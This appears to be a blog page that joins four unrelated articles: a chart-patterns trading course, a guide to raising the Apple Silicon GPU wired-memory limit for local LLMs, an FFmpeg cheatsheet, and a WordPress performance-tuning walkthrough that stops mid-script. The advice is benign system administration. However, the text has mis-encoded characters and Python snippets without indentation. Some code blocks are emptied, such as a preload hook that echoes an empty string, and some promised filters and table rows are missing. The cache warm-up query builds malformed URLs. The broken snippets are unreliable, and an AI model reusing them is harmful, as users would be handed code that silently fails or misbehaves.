Chart Patterns Course. This 10-chapter series is designed for people who want something stricter than retail pattern folklore and more practical than pure academic dismissal. The goal is simple: understand what chart patterns describe, when they are useful, when they fail, and how to turn them into disciplined trading decisions without pretending that triangles have supernatural powers.
A proper chart-patterns course is not a gallery of shapes. It is a framework for context, evidence, execution, and risk.
What This Course Covers
Most chart-pattern courses jump from shape recognition straight to trade entry, as if the market exists solely to reward anyone who spots a head and shoulders before breakfast. This course takes the opposite route. We begin with definitions and market structure, move through reversal and continuation setups, then spend serious time on breakouts, timeframes, regime filters, sizing, expectancy, evidence, backtesting, and professional deployment. In other words, the shapes are only the beginning.
The material is grounded in a mix of practitioner and academic sources. You will see classic references where terminology matters, but the course leans on evidence from Andrew Lo, Harry Mamaysky, Jiang Wang, Carol Osler, modern support-and-resistance studies, trend-following research from AQR, and institutional material from CME, FINRA, the SEC, and ESMA. That balance matters. Pattern trading becomes dangerous when students are given the vocabulary of technical analysis without the discipline of risk management and the humility of evidence.
How To Use The Series
Read the course in order if you are new to the topic. If you already trade patterns, Chapters 7 through 10 will probably hurt your feelings in a productive way because they focus on the part that actually decides whether a strategy survives: stop placement, position sizing, cost drag, test design, execution logic, and review discipline. The market does not care how beautiful your ascending triangle looked on TradingView if the setup was taken in the wrong regime with a stop parked exactly where everyone else parked theirs.
Each chapter includes one core illustration, one focused lesson, and a short summary takeaway at the bottom. Every chapter also links to the previous chapter, the next chapter, and this full course page so the structure behaves like a proper course rather than a pile of disconnected blog posts.
This course is for discretionary traders who want better structure, system builders who want cleaner definitions, and beginners who would rather learn the hard parts before the market teaches them using actual money. It is not for people who want a magic success rate, a single indicator to bless every trade, or a story about how βsmart moneyβ secretly paints every chart pattern by hand like a villain in a low-budget thriller.
This course is part of the finance content on SudoAll and is built from the source video, independent research, and additional primary material from academic and institutional references.
Full course here:Chart Patterns Course – Evidence, Execution, and Risk. If you want the full 10-chapter version with table of contents, previous/next chapter navigation, and dedicated lessons on risk, backtesting, and evidence, start there after this introduction.
Chart patterns are the finance equivalent of seeing constellations. Sometimes the stars really do line up, but only if you stop pretending every triangle is destiny. Fortune Talks’ long YouTube course gets one important thing right: patterns are visual summaries of supply, demand, hesitation, and breakout pressure. Where most beginner courses go wrong is turning that into a treasure map. A head and shoulders is not money. It is a conditional setup that needs trend context, participation, and disciplined execution.
Chart patterns are not magic shapes. They are compressed pictures of crowd behaviour, liquidity, and failed auctions.
What Chart Patterns Really Capture
At their best, chart patterns compress crowd behaviour into shapes traders can act on. Flags and triangles describe pauses inside a trend. Double tops, double bottoms, and head-and-shoulders structures describe failed auctions where one side is losing control. Andrew Lo, Harry Mamaysky, and Jiang Wang tried to move this subject from folklore to measurement by formalising pattern recognition on decades of U.S. stock data.
That is the key correction to the “all patterns work” myth. The serious claim is not that geometry predicts price by magic. The serious claim is that recurring structures can shift the distribution of outcomes. Kahneman’s warning in Thinking, Fast and Slow fits perfectly here: the human brain loves fast pattern recognition, but markets punish fast certainty. A chart pattern is a hypothesis, not a verdict.
What Is the Success Rate, Actually?
The honest answer is that there is no single success rate worth tattooing on your keyboard. Results vary by market, timeframe, execution quality, fees, and whether you trade the breakout, the close, or the retest. The respectable literature says three useful things. First, patterns can contain information. Second, that information is conditional rather than universal. Third, implementation quality decides whether the edge survives transaction costs.
“These tests strongly support the claim that support and resistance levels help predict intraday trend interruptions for exchange rates.” – Carol Osler, Federal Reserve Bank of New York
Osler’s work matters because it tests signals used by real market participants rather than fantasy charts drawn after the move. More recent quantitative work reached a similar conclusion on intraday support and resistance:
The pattern-specific evidence is mixed but not empty. In research on U.S. equities, Savin, Weller, and Zvingelis reported that head-and-shoulders signals improved risk-adjusted returns when used conditionally, but they did not support a naive stand-alone trading religion. That is the real lesson. Patterns can add information. They rarely deserve to be your entire trading system.
The Failure Cases Beginners Learn the Hard Way
Case 1: Entering before the breakout is confirmed
The video correctly emphasises breakout logic. The trap is anticipation. Traders see an ascending triangle, jump early, and call it conviction. The market calls it liquidity.
# Bad: trade the pattern before confirmation
if pattern == "ascending_triangle":
buy()
# Better: require a decisive close and participation
if pattern == "ascending_triangle" and close > resistance and volume > 1.5 * avg_volume_20:
buy()
Premature entries convert a probabilistic setup into a coin flip with worse pricing.
Case 2: Ignoring the higher timeframe regime
A bullish flag inside a clean weekly uptrend is not the same object as a bullish flag under a falling 200-day moving average. One is continuation. The other is often a dead-cat drawing with better marketing.
# Bad: every flag gets treated equally
signal = detect_flag(data)
# Better: trade with regime
signal = detect_flag(data)
trend_ok = close > ema_50 and ema_50 > ema_200
if signal and trend_ok:
buy()
Case 3: Pretending measured-move targets beat transaction costs by default
This is where most course material becomes decorative. A 1.2R setup on a noisy intraday chart can look beautiful and still be useless after spread, slippage, and misses.
This is the part beginners skip because it is less exciting than spotting a cup and handle. It is also the part that decides whether you stay in the game.
Most pattern failures are implementation failures: early entry, wrong regime, or a cost structure that eats the edge.
Best Ways to Implement Chart Patterns in Practice
If you actually want to use the ideas from the course, do it like a process engineer, not a pattern tourist. Restrict yourself to liquid instruments. Start with regime classification. Define the trigger mechanically. Require confirmation. Then place the stop where the thesis is invalidated, not where your ego gets uncomfortable. The video is right that timeframes matter: daily and four-hour structures are usually more reliable than frantic one-minute pattern hunting because more participants see them and cost drag is smaller.
Step 1: Restrict the universe. Focus on liquid names or liquid index products.
Step 2: Start with regime. Continuation patterns need trend persistence; reversal patterns need exhaustion plus failed follow-through.
Step 3: Define the trigger mechanically. Use a closing break beyond the boundary, a retest rule, or both.
Step 4: Require confirmation. Volume expansion and volatility contraction before breakout help filter noise.
Step 5: Size the trade from the stop. Risk per trade should be fixed before the order is sent.
def trade_pattern(pattern, data):
if not pattern.confirmed_close:
return None
if not data.regime_is_aligned:
return None
if data.breakout_volume < 1.5 * data.avg_volume_20:
return None
entry = data.close
stop = pattern.invalidation_level
target = entry + 2 * (entry - stop)
return {"entry": entry, "stop": stop, "target": target}
A useful chart pattern is a checklist with an invalidation level, not a doodle with hope attached.
When Chart Patterns Are Actually Fine
Chart patterns are perfectly respectable when used as a language for trade location, watchlist construction, and risk definition. They are especially useful for swing traders who need a structured way to organise entries and invalidation points. They are much less convincing as a stand-alone alpha source in fast, fee-heavy intraday trading. Put differently: patterns work better as a decision framework than as a superstition.
If you cannot explain the regime, trigger, invalidation, and cost assumptions, you do not have a setup yet.
What to Check Right Now
Backtest one pattern at a time with real spreads and slippage before adding it to your playbook.
Separate continuation from reversal setups because their failure mechanics are different.
Track expectancy, not just win rate. A lower win rate can still be superior if average winners are materially larger than average losers.
Use daily or four-hour charts first if you are learning. Higher timeframes usually mean cleaner structure and lower cost drag.
Review every false breakout to see whether volume, regime, or liquidity should have filtered it out.
Video Attribution
This article builds on the educational YouTube course below and adds the quantitative evidence, implementation rules, and failure analysis that most chart-pattern tutorials leave out.
There is a particular kind of modern disappointment that only happens on an Apple Silicon Mac. You have 16 GB of unified memory, your model file is “only” 11 GB on disk, LM Studio looks optimistic for a moment, and then the load fails like a Victorian gentleman fainting at the sight of a spreadsheet. The internet calls this “hidden VRAM”. That phrase is catchy, but it is also slightly nonsense. Your Mac does not have secret gamer VRAM tucked behind the wallpaper. What it has is a shared memory pool and a tunable guardrail for how much of that pool the GPU side of the system is allowed to wire down. Move the guardrail carefully and some local LLMs that previously refused to load will suddenly run. Move it carelessly and your machine turns into a very expensive beachball generator.
This is not free VRAM. It is a movable fence inside a shared pool.
The practical knob is iogpu.wired_limit_mb. On this 16 GB Apple Silicon Mac, the default is still the default from the video:
That 0 means “use the system default policy”, not “unlimited”. For people running local models, that distinction matters. The interesting bit is that the policy is often conservative enough that a model which should fit on paper does not fit in practice once GPU allocations, KV cache, context length, the window server, and ordinary macOS overhead all take their cut. The result is a very familiar sentence: failed to load model.
What This Setting Actually Changes
Apple’s architecture is the key to understanding why this works at all. Unlike a desktop PC with separate system RAM and discrete GPU VRAM, Apple Silicon uses one shared pool. Apple says it plainly:
That one sentence explains both the magic and the pain. The magic is that Apple laptops and minis can run surprisingly capable local models without a discrete GPU at all. The pain is that every byte you hand to GPU-backed inference is a byte you are not handing to the rest of the operating system. This is capacity planning, not sorcery. Kleppmann would recognise it instantly from Designing Data-Intensive Applications: one finite resource, several hungry consumers, and trouble whenever you pretend the budget is not real.
The lower-level Metal API exposes the same idea in more formal language. The property recommendedMaxWorkingSetSize is defined by Apple as:
Notice the wording: without affecting runtime performance. Apple is not promising a hard technical ceiling. It is describing a safety line. The iogpu.wired_limit_mb trick is, in effect, you saying: “thank you for the safety line, I would like to move it because I know what else is running on this machine”.
If you want to see the same concept from code rather than from a slider in LM Studio, a tiny Metal program can query the recommended budget directly:
import Metal
if let device = MTLCreateSystemDefaultDevice() {
let bytes = device.recommendedMaxWorkingSetSize
let gib = Double(bytes) / 1024.0 / 1024.0 / 1024.0
print(String(format: "Recommended GPU working set: %.2f GiB", gib))
}
That value is the polite answer. iogpu.wired_limit_mb is how you become impolite, but hopefully still civilised.
Why Models Fail Before RAM Looks Full
Most newcomers look at the model file size and do schoolboy arithmetic: “11 GB file, 16 GB machine, therefore fine.” That works right up until reality arrives with a clipboard. Runtime memory use includes the model weights, the KV cache, backend allocations, context-length overhead, app overhead, and the rest of macOS. LM Studio explicitly gives you a way to inspect this before you pull the pin:
“Preview memory requirements before loading a model using --estimate-only.” – LM Studio Docs, lms load
That is not a decorative feature. Use it. Also note LM Studio’s platform advice for macOS: 16GB+ RAM recommended, with 8 GB machines reserved for smaller models and modest contexts. The point is simple: local inference is not decided by model download size alone. It is decided by total live working set.
# Ask LM Studio for the memory estimate before loading
lms load --estimate-only openai/gpt-oss-20b
# Lower context if the estimate is close to the edge
lms load --estimate-only openai/gpt-oss-20b --context-length 4096
# If needed, reduce GPU usage rather than insisting on "max"
lms load openai/gpt-oss-20b --gpu 0.75 --context-length 4096
That last point is underappreciated. Sometimes the right answer is not “raise the wired limit”. Sometimes the right answer is “pick a saner context length” or “run a smaller quant”. Engineers love hidden toggles because they feel like boss fights. In practice, boring budgeting wins.
The Failure Modes Nobody Mentions in the Thumbnail
The YouTube version of this story is understandably upbeat: type command, load bigger model, cue triumphant tokens per second. The real world deserves a sterner briefing. Three failure cases show up over and over.
Case 1: The Model File Fits, But the Live Working Set Does Not
The trigger is a model whose weights fit comfortably on disk, but whose runtime footprint exceeds the combined budget once context and cache are included.
# Bad mental model:
# "The GGUF is 11 GB, so my 16 GB Mac can obviously run it."
model_weights_gb = 11.2
kv_cache_gb = 1.8
backend_overhead_gb = 0.8
desktop_overhead_gb = 2.0
total_live_working_set = (
model_weights_gb +
kv_cache_gb +
backend_overhead_gb +
desktop_overhead_gb
)
print(total_live_working_set) # 15.8 GB, and we still have no safety margin
What happens next is either a clean refusal to load or a dirty scramble into memory pressure. The correct pattern is to estimate first, shrink context if necessary, and accept that a lower-bit quant is often the smarter answer than a higher limit.
# Better approach: estimate, then choose the model tier that fits
lms load --estimate-only qwen/qwen3-8b
lms load --estimate-only openai/gpt-oss-20b --context-length 4096
# If the estimate is borderline, step down a tier
lms load qwen/qwen3-8b --gpu max --context-length 8192
Case 2: You Raise the Limit So High That macOS Starts Fighting Back
This happens when you treat unified memory as if it were dedicated VRAM and leave the operating system too little breathing room. Headless Mac minis tolerate this better. A laptop with browsers, Finder, Spotlight, and a normal human life happening on it does not.
# Aggressive and often reckless on a 16 GB machine
sudo sysctl iogpu.wired_limit_mb=16000
# Then immediately try to load a borderline model
lms load openai/gpt-oss-20b --gpu max
The machine may still succeed, which is what makes this dangerous. Success under orange memory pressure is not proof of wisdom. It is proof that you got away with it once. The better pattern is to leave deliberate headroom for the OS and keep a close eye on Activity Monitor while you test.
# A more conservative example for a 16 GB Mac
sudo sysctl iogpu.wired_limit_mb=14336
# Verify the setting
sysctl iogpu.wired_limit_mb
# Then test with a realistic context length
lms load openai/gpt-oss-20b --context-length 4096
Case 3: You Optimise the Wrong Thing and Ignore Context Length
A surprisingly common mistake is to chase the biggest possible model whilst leaving an unnecessarily large context window enabled. KV cache is not free. A smaller context often buys you more stability than another dramatic sysctl ever will.
# Bad: max everything, then act surprised
lms load some-14b-model --gpu max --context-length 32768
# Better: fit the workload, not your ego
lms load some-14b-model --gpu max --context-length 4096
lms load some-8b-model --gpu max --context-length 8192
This is the computing equivalent of bringing a grand piano to a pub quiz. Impressive, yes. Appropriate, no.
The danger sign is not failure to load. It is successful loading with no oxygen left for the rest of the machine.
How to Tune It Without Turning Your Mac Into a Toaster
The safe way to use this setting is incremental, reversible, and boring. Those are good qualities in systems work. Start from default, raise in steps, test one model at a time, and watch memory pressure rather than vibes.
Check the current value. If it is 0, you are on the system default policy.
Pick a target that still leaves real headroom. On a 16 GB machine, 14 GB is already adventurous. On a dedicated headless box, you can be bolder.
Restart the inference app. Tools like LM Studio need to re-detect the budget.
Load with a realistic context length. Do not benchmark recklessness.
Reset to default if the machine becomes unpleasant. A responsive Mac beats a heroic screenshot.
# 1. Inspect current policy
sysctl iogpu.wired_limit_mb
# 2. Raise cautiously
sudo sysctl iogpu.wired_limit_mb=12288
# 3. Test, observe, then step up if needed
sudo sysctl iogpu.wired_limit_mb=14336
# 4. Return to default policy
sudo sysctl iogpu.wired_limit_mb=0
If you truly need this on every boot, automate it like any other operational setting. Treat it as host configuration, not as a ritual you half-remember from a video. But also ask the adult question first: if you need a startup hack to run the model comfortably, should you really be running that model on this machine?
The second practical tool is estimation. Run the estimator before the load, not after the error:
# Compare two candidates before wasting time
lms load --estimate-only qwen/qwen3-8b
lms load --estimate-only mistral-small-3.1-24b --context-length 4096
# Use the estimate to choose the smaller model or context
lms load qwen/qwen3-8b --gpu max --context-length 8192
Which Models Actually Make Sense on Different Apple Silicon Macs
This is the section everybody really wants. Exact numbers depend on quant format, context length, backend behaviour, and what else the machine is doing. But the tiers below are realistic enough to save people from magical thinking.
Mac memory tier
Comfortable local LLM tier
Possible with tuning
Usually a bad idea
16 GB
3B to 8B models, 12B class with modest context
Some 14B to 20B quants if you raise the limit and stay disciplined
Large context 20B+, 30B-class models during normal desktop use
24 GB
8B to 14B models, many 20B-class quants
Some 24B to 32B models with sensible context
Treating it like a 64 GB workstation
32 GB to 48 GB
14B to 32B models comfortably, larger contexts for practical work
Some 70B quants on the upper end, especially on dedicated machines
Huge models plus giant context plus desktop multitasking
64 GB and above
30B to 70B-class quants become genuinely usable
Aggressive large-model experimentation on headless or dedicated Macs
Assuming every app uses memory exactly the same way
If you want a one-line rule of thumb, it is this: on a 16 GB machine, think “excellent 7B to 8B box, adventurous 14B box, occasional 20B parlour trick”. On a 24 GB or 32 GB machine, the world gets much nicer. On a 64 GB+ Mac Studio, the conversation changes from “can I load this?” to “is the speed good enough for the inconvenience?”
Also remember that smaller, better-tuned models often beat larger awkward ones for day-to-day coding, search, summarisation, and chat. A responsive 8B or 14B model you actually use is more valuable than a 20B model that only runs when the stars align and Chrome is closed.
The machine class matters more than the myth. Fit the model tier to the memory tier.
When the Default Setting Is Actually Fine
The balanced answer is that the default exists for good reasons. If your Mac is a general-purpose laptop, if you care about battery life and responsiveness, if you run multiple heavy apps at once, or if your local LLM work is mostly 7B to 8B models, leave the setting alone. The system default is often the correct trade-off.
This is also true if your workload is bursty rather than continuous. For occasional summarisation, coding assistance, or local RAG over documents, it is usually better to pick a slightly smaller model and preserve the machine’s overall behaviour. The hidden cost of “bigger model at any price” is that you stop trusting the computer. Once a laptop feels brittle, you use it less. That is bad engineering and worse ergonomics.
There is another subtle point. The wired-limit trick helps most when the machine is effectively dedicated to inference: a headless Mac mini, a quiet box on the shelf, a Mac Studio cluster, or a desktop session where you are willing to treat inference as the primary job. The closer your Mac is to a single-purpose appliance, the more sense this tweak makes.
What To Check Right Now
Check the current policy: run sysctl iogpu.wired_limit_mb and confirm whether you are on the default setting.
Estimate before loading: use lms load --estimate-only so you know the model’s live working set before you commit.
Audit context length: if you are using 16k or 32k context by habit, ask whether 4k or 8k would do the same job.
Watch memory pressure, not just free RAM: Activity Monitor tells you more truth than a single headline number.
Leave deliberate headroom: a model that barely runs is not a production setup, it is a stunt.
Reset when testing is over:sudo sysctl iogpu.wired_limit_mb=0 is a perfectly respectable ending.
Most wins come from estimation, context discipline, and realistic model choice, not from one dramatic command.
The honest headline, then, is better than the clickbait one. Your Mac does not have hidden VRAM waiting to be unlocked like a cheat code in a 1998 driving game. What it has is unified memory, a conservative GPU working-set policy, and enough flexibility that informed users can rebalance the machine for local inference. That is genuinely useful. It is also exactly the sort of useful that punishes people who confuse “possible” with “free”.
Video Attribution
This article was inspired by Alex Ziskind’s video on adjusting the GPU wired-memory limit for local LLM use on Apple Silicon Macs. The video is worth watching for the quick demonstration, particularly if you want to see the behaviour in LM Studio before you touch your own machine.
FFmpeg is what happens when a Swiss Army knife gets a PhD in multimedia and then refuses to use a GUI. It can inspect, trim, remux, transcode, filter, normalise, package, stream, and automate media pipelines with almost rude efficiency. The catch is that it speaks in a grammar that is perfectly logical and completely uninterested in your vibes. Put one option in the wrong place and FFmpeg will not “figure it out”. It will hand you a lesson in command-line causality.
This version is built to be kept open in a tab: a smarter cheatsheet, a modern streaming reference, a compact guide to the commands worth memorising, and a curated collection of official docs plus a few YouTube resources that are actually worth your time. We will cover the fast path, the dangerous path, and the production path.
FFmpeg in one picture: streams go in, decisions get made, codecs either behave or get replaced.
First Principles: How FFmpeg Actually Thinks
Most FFmpeg confusion begins with the wrong mental model. Humans think in files. FFmpeg thinks in inputs, streams, codecs, filters, mappings, and outputs. A single file can contain several streams: video, multiple audio tracks, subtitles, chapters, timed metadata. FFmpeg lets you inspect that structure, choose what to keep, decode only what needs changing, then write a new container deliberately.
The core trio is simple. ffmpeg transforms media. ffprobe tells you what is actually in the file. ffplay previews quickly. The smartest FFmpeg habit is also the least glamorous: ffprobe first, ffmpeg second. Guessing stream layout is how people end up with silent video, the wrong commentary track, or subtitles that evaporate on contact with MP4.
“As a general rule, options are applied to the next specified file. Therefore, order is important, and you can have the same option on the command line multiple times.” – FFmpeg Documentation, ffmpeg manual
That rule explains most self-inflicted FFmpeg pain. Input options belong before the input they affect. Output options belong before the output they affect. You are not writing prose. You are wiring a pipeline.
The other distinction worth burning into memory is container versus codec. MP4, MKV, MOV, WebM, TS, and M4A are containers. H.264, HEVC, AV1, AAC, Opus, MP3, ProRes, and DNxHR are codecs. Containers are boxes. Codecs are how the contents were compressed. A huge fraction of “FFmpeg is broken” reports are really “I changed the box and forgot the contents still have rules”.
The command-flow model: inspect streams, decide what gets copied, decide what gets filtered, then write the output on purpose.
The Fast Lane: Steal These Commands First
If you only memorise a dozen FFmpeg moves, make them these. They cover the majority of real-world jobs: inspect, copy, trim, transcode, subtitle, extract, package, and deliver.
Job
Command
Use it when
Inspect a file properly
ffprobe -hide_banner input.mkv
You want the truth about streams before touching anything.
“Streamcopy is useful for changing the elementary stream count, container format, or modifying container-level metadata. Since there is no decoding or encoding, it is very fast and there is no quality loss.” – FFmpeg Documentation, ffmpeg manual
If you remember one performance trick, remember -c copy. It is the difference between “done in a second” and “let me hear all your laptop fans introduce themselves”.
Modern FFmpeg: Streaming, Packaging, and Delivery in 2026
This is where a lot of older FFmpeg write-ups feel dusty. Modern usage is not just “convert AVI to MP4”. It is packaging for adaptive streaming, feeding live ingest pipelines, generating web-safe delivery files, and choosing the correct transport for the job instead of shouting at RTMP because it was popular in 2014.
“WebRTC (Real-Time Communication) muxer that supports sub-second latency streaming according to the WHIP (WebRTC-HTTP ingestion protocol) specification.” – FFmpeg Formats Documentation, WHIP muxer
That is the modern landscape in miniature. FFmpeg is not only a transcoder. It is a packaging and transport tool. Use the right mode for the latency, compatibility, and scale you actually need.
WHIP is interesting because it reflects the current internet, not the old one. If your target is low-latency browser delivery, WHIP and WebRTC are now part of the real conversation, not just interesting acronyms for protocol collectors.
Modern FFmpeg is packaging plus transport plus compatibility engineering, not just transcoding.
Hardware Acceleration Without Lying to Yourself
Modern FFmpeg usage also means knowing when to use hardware encoders. They are fantastic when throughput matters: live streaming, batch transcoding, preview generation, cloud pipelines, and “I have 800 files and would prefer not to age visibly today”. They are not always the best answer for maximum compression efficiency or highest archival quality.
The practical rule is simple. If you need the best quality-per-bit, software encoders like libx264, libx265, and libaom-av1 still matter. If you need speed and acceptable quality, hardware encoders are often the right move.
Platform
Common encoder
Example
NVIDIA
h264_nvenc, hevc_nvenc, sometimes AV1 on newer cards
The mistake people make is assuming hardware encode means “same quality, just faster”. Often it means “faster, different tuning, sometimes larger bitrate for comparable quality”. Be honest about the trade-off. This is not a moral issue. It is an engineering one.
Failure Cases That Keep Reappearing
Hunt and Thomas argue in The Pragmatic Programmer that good tools reward understanding over superstition. FFmpeg is one of the clearest examples of that principle on the command line. Here are the mistakes that keep burning people because they look plausible until you understand what FFmpeg is actually doing.
Case 1: You Wanted Speed, but Also Expected Frame Accuracy
Putting -ss before -i is fast. It is often not frame-accurate. That is a feature, not a betrayal.
Case 3: FFmpeg Picked the Wrong Streams Because You Left It to Fate
Auto-selection works until the source has multiple languages, commentary, descriptive audio, or subtitles. At that point, the polite thing to do is map explicitly.
# Ambiguous and sometimes unlucky
ffmpeg -i movie.mkv -c copy output.mp4
Filtergraphs stop being scary the moment you read them as labelled dataflow instead of punctuation.
The Best Collection to Bookmark
If you want the strongest FFmpeg learning stack from basic to advanced, use this order. Not because it is trendy, but because it respects how people actually learn complicated tools: truth first, intuition second, repetition third.
The rule is simple: use YouTube for intuition, use the official docs for truth. The people who confuse those two categories usually end up with very confident commands and very confusing output.
What to Check Right Now
Adopt one boring, reliable web delivery recipe – H.264, AAC, and -movflags +faststart will solve more problems than exotic cleverness.
Use ffprobe before every important transcode – that one habit prevents a ridiculous amount of avoidable breakage.
Reach for -c copy first when no transformation is needed – it is faster and lossless, which is suspiciously close to magic.
Move from RTMP-only thinking to transport-aware thinking – HLS for compatibility, DASH for adaptive packaging, SRT for rougher networks, WHIP for low-latency browser workflows.
Pick hardware encoders when throughput matters and software encoders when efficiency matters – this is the real trade-off, not ideology.
Build a private snippets file – five good FFmpeg recipes will do more for your sanity than fifty vague memories.
FFmpeg rewards the same engineering habit that every serious tool rewards: inspect first, be explicit, automate the boring parts, and choose the transport and packaging that fit the real system in front of you. Do that and FFmpeg stops feeling like cryptic wizardry and starts feeling like infrastructure. Which is exactly what it is.
WordPress ships slow. Not broken-slow, but “a friend who takes 4 seconds to answer a yes/no question” slow. The default stack serves every request through PHP, loads jQuery plus its migration shim for a site that hasn’t used jQuery 1.x in a decade, ships full-resolution images to mobile screens, and trusts the browser to figure out layout before it has seen a single pixel. Google’s PageSpeed Insights will hand you a score in the 40s and a wall of red, and you’ll spend an afternoon convinced the problem is your hosting. It is not. This guide walks through every layer of the fix, from OPcache to image compression to full-page static caching, and explains exactly why each one moves the needle.
From a 49 on mobile to 95+: what a full stack optimisation actually looks like.
What PageSpeed Is Actually Measuring
Before you touch a file, understand what you are chasing. PageSpeed Insights (backed by Lighthouse) reports five metrics, each targeting a distinct user experience moment:
First Contentful Paint (FCP) β the moment the browser renders any content at all. Dominated by render-blocking CSS and JS in the <head>.
Largest Contentful Paint (LCP) β when the biggest visible element finishes loading. Usually your hero image or a large heading. Google’s threshold for “good” is under 2.5 seconds.
Total Blocking Time (TBT) β the sum of all long tasks on the main thread between FCP and Time to Interactive. Every JavaScript file parsed synchronously contributes here. Zero is the target.
Cumulative Layout Shift (CLS) β how much the page jumps around as assets load. Images without explicit width and height attributes are the most common culprit. Target: under 0.1.
Speed Index β a composite of how fast the visible content populates. Think of it as the integral under the FCP curve.
“LCP measures the time from when the page first starts loading to when the largest image or text block is rendered within the viewport.” β web.dev, Largest Contentful Paint (LCP)
The audit starts with a fresh Chrome incognito load over a throttled 4G connection. Any caching your browser has built up is irrelevant; PageSpeed is measuring the cold-load experience of a first-time visitor on a mediocre phone connection. Every millisecond counts from the first TCP packet.
Layer 1: Images β The Biggest Win by Far
Images are almost always the single largest contributor to poor LCP on a self-hosted WordPress blog. A typical upload flow is: photographer exports a 4000Γ3000 JPEG at 90% quality, editor uploads it via the WordPress media library, WordPress generates a handful of named thumbnails but leaves the original untouched, and the theme serves the full 8 MB original to every visitor. The browser then scales it down in CSS. The bytes still travel across the wire.
Case 1: Full-Resolution Originals Served to Every Visitor
When a theme uses get_the_post_thumbnail_url() without specifying a size, or uses a custom field storing the original upload URL, WordPress happily hands out the unprocessed original.
# Find images over 200KB in your uploads directory
find /var/www/html/wp-content/uploads -name "*.jpg" -size +200k | wc -l
# Batch-resize and compress in place with ImageMagick
# Max 1600px wide, JPEG quality 75, strip metadata
find /var/www/html/wp-content/uploads -name "*.jpg" -o -name "*.jpeg" | \
xargs -P4 -I{} mogrify -resize '1600x>' -quality 75 -strip {}
find /var/www/html/wp-content/uploads -name "*.png" | \
xargs -P4 -I{} mogrify -quality 85 -strip {}
On a typical blog, this step alone drops total image payload by 60β80%. Run it, clear your cache, and re-run PageSpeed before touching anything else. On this site, 847 images went from an average of 380 KB down to 62 KB.
Case 2: Images Without Width and Height Attributes (CLS Killer)
The browser cannot reserve space for an image before it downloads if the HTML does not declare its dimensions. The result: as images load in, everything below them jumps down the page. Google counts every pixel of that shift against your CLS score.
WordPress 5.5+ adds these attributes for images inserted via the block editor, but anything in post content from older posts, theme templates, or plugins is a wildcard. The fix is a PHP filter that scans every <img> tag and injects dimensions if they are missing:
The browser’s preload scanner will not discover a CSS background image or a lazily-loaded image until it builds the render tree. If your LCP element is a featured image, preload it in the <head> so the browser fetches it at the same time as the HTML:
add_action( 'wp_head', 'sudoall_preload_lcp_image', 1 );
function sudoall_preload_lcp_image() {
if ( ! is_singular() ) return;
$thumb_id = get_post_thumbnail_id();
if ( ! $thumb_id ) return;
$src = wp_get_attachment_image_url( $thumb_id, 'large' );
if ( $src ) {
echo '' . "\n";
}
}
The full caching stack: each layer eliminates a different class of latency.
Layer 2: The Caching Stack
WordPress without caching is a PHP application that rebuilds every page from scratch on every request: parse PHP, load plugins, run sixty-odd database queries, render templates, and flush the output buffer to the client. A modern server can do this in 200β400 ms on a good day. Under any real traffic, MySQL connection queues start forming and TTFB climbs past 800 ms. Add the time for a mobile browser on 4G to receive and render those bytes and you have a 3-second LCP before the CSS even loads.
The solution is layered caching. Think of each layer as an earlier exit that avoids all the work below it.
PHP OPcache (Bytecode Caching)
PHP compiles every source file to bytecode before executing it. Without OPcache, this happens on every request. With OPcache enabled, the compiled bytecode is stored in shared memory and reused. For a WordPress site with hundreds of PHP files across core, plugins, and the theme, this is a substantial saving.
; In php.ini or a custom opcache.ini
opcache.enable=1
opcache.memory_consumption=128
opcache.interned_strings_buffer=16
opcache.max_accelerated_files=10000
opcache.revalidate_freq=60
opcache.fast_shutdown=1
Verify it is active inside the container: docker exec your-wordpress-container php -r "echo opcache_get_status()['opcache_enabled'] ? 'OPcache ON' : 'OFF';"
Redis Object Cache (Database Query Caching)
WordPress calls $wpdb->get_results() for things like sidebar widget listings, navigation menus, and term lookups on every page. Redis Object Cache (the plugin by Till KrΓΌss) hooks into WordPress’s WP_Object_Cache API and stores query results in Redis, a sub-millisecond in-memory store. Repeat queries skip the database entirely.
After connecting Redis, activate the Redis Object Cache plugin from the WordPress admin. The first page load primes the cache; subsequent loads skip the DB for cached data.
WP Super Cache (Full-Page Static HTML)
The deepest cache, and the most impactful for TTFB. WP Super Cache writes the fully rendered HTML of each page to disk as a static file. Apache (via mod_rewrite) serves this file directly, bypassing PHP and MySQL entirely. A cached page response time drops from 200β400 ms to under 5 ms.
# .htaccess β serve cached static files directly via mod_rewrite
# (WP Super Cache generates these rules; this is the HTTPS variant)
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_METHOD} !POST
RewriteCond %{QUERY_STRING} ^$
RewriteCond %{HTTP:Cookie} !^.*(comment_author|wordpress_[a-f0-9]+|wp-postpass).*$
RewriteCond %{HTTPS} on
RewriteCond %{DOCUMENT_ROOT}/wp-content/cache/supercache/%{HTTP_HOST}%{REQUEST_URI}index-https.html -f
RewriteRule ^ wp-content/cache/supercache/%{HTTP_HOST}%{REQUEST_URI}index-https.html [L]
Cache Warm-Up: Don’t Leave Visitors on the Cold Path
The first visitor to any page after a cache flush or server restart hits the full PHP stack. For a blog with 100 published posts, that is 100 potential cold-hit requests. The fix is a warm-up script that crawls all published URLs immediately after any flush:
#!/bin/bash
# warm-cache.sh β pre-warm WP Super Cache for all published posts and pages
URLS=$(mysql -h 127.0.0.1 -u root -p"${MYSQL_ROOT_PASSWORD}" sudoall_prod \
-se "SELECT CONCAT('https://sudoall.com', post_name) FROM wp_posts \
WHERE post_status='publish' AND post_type IN ('post','page');")
echo "$URLS" | xargs -P8 -I{} curl -s -o /dev/null -w "%{url_effective} %{http_code}\n" {}
echo "Cache warm-up complete."
Schedule this with cron: 5 * * * * /srv/www/site/warm-cache.sh. Every hour, right after the cache TTL expires, it re-primes all pages.
Core Web Vitals: each metric maps to a specific user experience moment.
Layer 3: JavaScript and CSS Delivery
A browser can only do one thing at a time on the main thread. A <script> tag without defer or async halts HTML parsing completely until the script is downloaded, compiled, and executed. Stack ten plugins each adding a synchronous script to the <head> and your TBT climbs into the hundreds of milliseconds before the user sees a single pixel.
Defer Non-Critical JavaScript
WordPress’s script_loader_tag filter lets you inject defer or async onto any registered script handle. Add defer to everything that doesn’t need to run before the DOM is painted:
WordPress loads jquery-migrate by default as a compatibility shim for plugins still using deprecated jQuery APIs from the 1.x era. If your theme and plugins don’t need it, it is dead weight on every page load. The correct removal (without breaking jQuery) is via wp_default_scripts:
If your blog has code blocks, you’re probably loading a syntax highlighter like highlight.js on every page, including pages with no code at all. The fix: use IntersectionObserver to load the highlighter only when a <pre><code> block actually enters the viewport.
document.addEventListener('DOMContentLoaded', function () {
var codeBlocks = document.querySelectorAll('pre code');
